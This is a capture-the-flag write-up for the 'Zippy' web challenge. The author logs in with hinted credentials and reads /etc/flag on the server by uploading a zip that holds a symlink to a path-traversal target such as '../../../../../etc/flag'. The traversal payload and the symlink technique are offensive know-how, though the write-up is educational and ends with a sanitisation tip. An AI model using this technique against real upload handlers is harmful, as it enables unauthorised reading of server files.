Zippy Challenge writeup CyberHack CTF
Zippy was one the challenge for Cyberhack CTF under Web category. It was a very interesting challenge as we need to exploit the PHP zip file parser to get our flag out. This challenge was very near to a real-world scenario as web applications frequently deal with zip files.
So, the challenge stated can we break the upload zip function, and URL for the challenge was provided. When visited the URL it showed a page like this.
It asked for username and password, here the solution is one case but how to take approach for such challenges is also important part. I will try to explain my mindset. So, first thing during CTF’s is to check common files on the web server. Sometimes that’s a easy win for you. I first checked robots.txt file on this URL.
The files was not present, still we wanted to login to this so we can upload our zip files to check. So the next thing was to check source of this page.
There was a comment telling the credentials are the name of this file and there was only one file in the page source called “admin.gif” So, our username and password is admin.
And, I was logged in, now there was a upload file option and a note saying the flag is there in /etc/flag file. So, our goal was to read that file to get our flag. So, I quickly zipped a simple php shell and uploaded to this page.
It just showed back the content of the file inside my uploaded zip file. Next thing came to my mind was to try reading a file with zip:// filter. There was trick posted sometime back by yumi_sec.
Ref: https://twitter.com/yumi_sec/status/1253620834691887105
This did not worked for this challenge, as maybe the admin was not saving the uploaded file at all. So, what was happening that zip file was unzipped and the file inside it was simply displayed (cat) in the output.
After searching for a while I came to know about a issue called “Zip Slip” it shows issues in Zip file parser written in various languages. So, the exploitation goes like putting files inside a zip file with specially crafted file names For Ex: “../etc/passwd” when the zip parser extracts it can lead to file path traversal on the server backend. You can read more about Zip slip here.
Now, I searched how we can craft a file with name something like “../../etc/flag” as this was our goal. I came to know that we can do that using Symlinks (Symbolic Links). After than we can add that symlink to a zip file using “ — symlinks” flag in zip command.
Once uploaded it gave and path error.
Here we can see the full path of our uploaded file get displayed and it shows error like “No such file or directory”. This error was coming because we were not in the flag directory yet we need to traverse back more. So, the second payload was “../../../../../etc/flag”
Same process zipped and uploaded the file, fingers crossed.
And it worked, We got our flag file content. So the flag. This can be a real world scenario for sure. To avoid this, one can properly sanitize special characters from a filename while extraction of a zip.
Thanks to CyberHack CTF team for setting this up. !!
Have a good one !! Happy hacking !!
